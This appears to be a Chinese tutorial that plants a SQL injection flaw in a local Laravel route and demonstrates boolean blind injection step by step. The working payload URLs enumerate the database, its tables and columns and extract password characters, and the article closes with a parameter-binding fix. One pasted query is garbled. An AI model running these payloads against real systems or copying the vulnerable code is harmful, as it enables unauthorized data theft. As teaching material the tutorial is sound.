通过laravel漏洞实例解析sql盲注原理-小浪学习网

本篇文章给大家带来了关于laravel的相关知识，其中主要介绍了怎样通过造一个laravel漏洞来讲解sql盲注原理，所谓的盲注就是在服务器没有错误回显的时候完成的注入攻击，下面一起来看一下，希望对大家有帮助。

通过laravel漏洞实例解析sql盲注原理

【相关推荐：laravel】

环境

composer create-project laravel/laravel lar9 // 安装laravel9 // 编辑.env  修改为DEBUG=false 配置数据库 DEBUG=false DB_HOST=.... php artisan migrate php artisan serve // 启动 // 插入数据 insert into users(`name`,`email`,`password`) values('xxh','4******qq.com','worldhello');

创建漏洞

// routes/web.php Route::get('/', function () {  $id = request()-&gt;id;  $user = AppModelsUser::whereRaw('id = '.$id)-&gt;first();  return $user-&gt;name ?? ''; }); // 最后转换的sql是: select * from users where id = $id

测试

http://127.0.0.1:8000/?id=1' // 500 http://127.0.0.1:8000/?id=1 and 1=2 // select * from users where id = 1 and 1=2; 返回空 http://127.0.0.1:8000/?id=1 and 1=1  // select * from users where id = 1 and 1=1 返回xxh

步骤

数据库名

猜出数据名长度

url: http://127.0.0.1:8000/?id=1 and length(database()) = 1 select * from users where id = 1 and length(database()) = 1 select * from users where id = 1 and length(database()) = 2 // 一直循环下去

猜出数据库名

从第一步 知道了数据库名长度 `select * from users where id = 1 and substr(database(),1,1) =a`  `select * from users where id = 1 and substr(database(),1,1) =b`  // 一直循环下去 找到数据库名的第一个做字符  然后找第二个字符  直到找完数据库名的长度

最终: laravel_project

表名

以下的步骤和猜数据库差不多，就简说了。

information_schema

information_schema 是 mysql 自带的，

数据库名表名列类型等都有记录，猜表字段明需要从这个数据库来。

猜 laravel_project 的表数量

url:   http://127.0.0.1:8000/?id=1 and (select count(*) from information_schema.tables where table_schema ="laravel_project" ) = 5 mysql&gt; select count(*) from information_schema.tables where table_schema ="laravel_projeelect count(column_name) from information_schema.columns where table_name= ’usersct"; +----------+ | count(*) | +----------+ |        5 | +----------+

猜第一个表名的长度

与 [猜出数据名长度] 此不多。

猜第一个表名

url:   http://127.0.0.1:8000/?id=1 and ( select substr(table_name,1,1) from information_schema.tables where table_schema ="laravel_project" limit 0,1) = 'f' mysql&gt; select substr(table_name,1,1) from information_schema.tables where table_schema ="laravel_project" limit 0,1; +------------------------+ | substr(table_name,1,1) | +------------------------+ | f                      | +------------------------+ // 得出第一个表的第一个字段是f  然后查第

最终得出第一个表名称为: failed_jobs

猜字段

和猜表一模一样的逻辑。

select count(column_name) from information_schema.columns where table_name= 'failed_jobs'; //  fail_jobs字段总数

猜数据

数据这才是最重要的。

因为 failed_jobs 没数据，所以我换成 users 来。

users 有个 password 字段。

mysql&gt; select substr((select password from users limit 0,1),1,1); +----------------------------------------------------+ | substr((select password from users limit 0,1),1,1) | +----------------------------------------------------+ | w                                                  | +----------------------------------------------------+ 得出第一个是w,存起来,最后判断  mysql&gt; select substr((select password from users limit 0,1),1,2); +----------------------------------------------------+ | substr((select password from users limit 0,1),1,2) | +----------------------------------------------------+ | wo                                                 | +----------------------------------------------------+ 第二个值为o 用第一个值 + 第二个值作为盲注

……

防御

(有时候 where 不满足需求，就需要 whereRaw)

如果需要，记得绑定就好。

Route::get('/', function () {  $id = request()-&gt;id;  $user = AppModelsUser::whereRaw('id = ?',[$id])-&gt;first();  return $user-&gt;name ?? ''; });

只要安份的用框架，不会会漏洞的。

那些老项目，漏洞满地飞。

现在这个时代，找漏洞难登天。

上面为了讲解简单，用是最简单的查找。

手工盲注应该用二分查找。

select * from users where id = 1 and  substr(database(),1,1) ='a'; 换成二分:  select * from users where id = 1 and  ascii(substr(database(),1,1)) &gt; 99;

最好还是直接借助工具 sqlmap, 直接扫出来。

【相关推荐：laravel】

以上就是通过

文章版权归作者所有，未经允许请勿转载。

THE END